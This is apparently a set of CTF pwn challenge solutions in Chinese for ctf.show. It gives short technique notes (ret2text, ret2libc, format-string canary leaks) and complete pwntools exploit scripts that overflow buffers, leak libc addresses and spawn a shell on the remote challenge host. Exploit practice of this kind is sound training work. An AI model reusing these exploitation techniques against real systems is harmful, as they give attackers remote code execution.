PWN01
简单栈溢出,ret2text
from pwn import *
#p = process("./pwn1")
p = remote(ip,port)
p.recv()
payload = 'a'*(0x9+4) + p32(0x0804850F)
p.sendline(payload)
p.interactive()
PWN03
32为程序,栈溢出,无system,ret2libc,32位程序通过栈传参
from pwn import *
from LibcSearcher import *
p=remote("pwn.challenge.ctf.show",28051)
#p=process("./stack1")
elf=ELF("./stack1")
puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]
main_addr=0x80484BB
payload1='a'*(9+4)+p32(puts_plt)+p32(main_addr)+p32(puts_got)
p.sendline(payload1)
p.recvuntil("\n\n")
puts_addr=u32(p.recv(4))
print(hex(puts_addr))
#puts_addr=0xc0a0
lib=LibcSearcher("puts",puts_addr)
lib_base=puts_addr-lib.dump("puts")
system_addr=lib_base+lib.dump("system")
binsh_addr=lib_base+lib.dump("str_bin_sh")
payload2='a'*(9+4)+p32(system_addr)+'aaaa'+p32(binsh_addr)
p.sendline(payload2)
p.interactive()
PWN04
存在canary,格式化字符串漏洞,通过格式化字符串漏洞泄露canary,在构造栈溢出
首先确定输入的偏移为6
canary和buf的距离为(0x70-0xc)=0x64=100
确定canary的偏移为100/4+6=31
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
#p = process('./ex2')
p = remote('pwn.challenge.ctf.show',28048)
payload='%31$x'
p.recvuntil("Hello Hacker!\n")
p.sendline(payload)
canary=int(p.recv(),16)
shell=0x804859B
payload2='a'*(0x70-0xc)+p32(canary)+'a'*0xc+p32(shell)
p.sendline(payload2)
p.interactive()
PWN05
简单栈溢出,ret2text
from pwn import *
#from LibcSearcher import *
context.log_level = 'debug'
#p = process('./ex2')
p = remote('pwn.challenge.ctf.show',28010)
payload='a'*(0x14+4)+p32(0x8048486)
p.sendline(payload)
p.interactive()
PWN06
简单栈溢出,ret2text,注意18位ubuntu需要栈对齐
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
#p = process('./ex2')
p = remote('pwn.challenge.ctf.show',28081)
payload='a'*(0xc+8)+p64(0x40057B)
p.sendline(payload)
p.interactive()
PWN07
ret2libc,64位程序先通过rdi等6个寄存器传参,多的通过栈传参
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
p=remote("pwn.challenge.ctf.show",28094)
#p=process("./pwn")
elf=ELF("./pwn")
puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]
main_addr=elf.sym["main"]
rdi_addr=0x4006e3
ret_addr=0x4004c6
payload1='a'*(0xc+8)+p64(rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
p.sendline(payload1)
p.recvuntil("\n")
puts_addr= u64(p.recvuntil(b"\n",drop=True).ljust(8,b"\x00"))
print(hex(puts_addr))
lib=LibcSearcher("puts",puts_addr)
lib_base=puts_addr-lib.dump("puts")
system_addr=lib_base+lib.dump("system")
binsh_addr=lib_base+lib.dump("str_bin_sh")
payload2='a'*(0xc+8)+p64(ret_addr)+p64(rdi_addr)+p64(binsh_addr)+p64(system_addr)
p.sendline(payload2)
p.interactive()
01栈溢出之ret2text
简单ret2text,注意栈对齐
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
#p = process('./ex2')
p = remote('pwn.challenge.ctf.show',28097)
payload='a'*(0x80+8)+p64(0x40063B)
p.sendline(payload)
p.interactive()
PWN10
格式化字符串漏洞,偏移为7
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
#p = process('./ex2')
p = remote('pwn.challenge.ctf.show',28067)
payload=p32(0x804A030)+'a'*0xc+'%7$n'
p.sendline(payload)
p.interactive()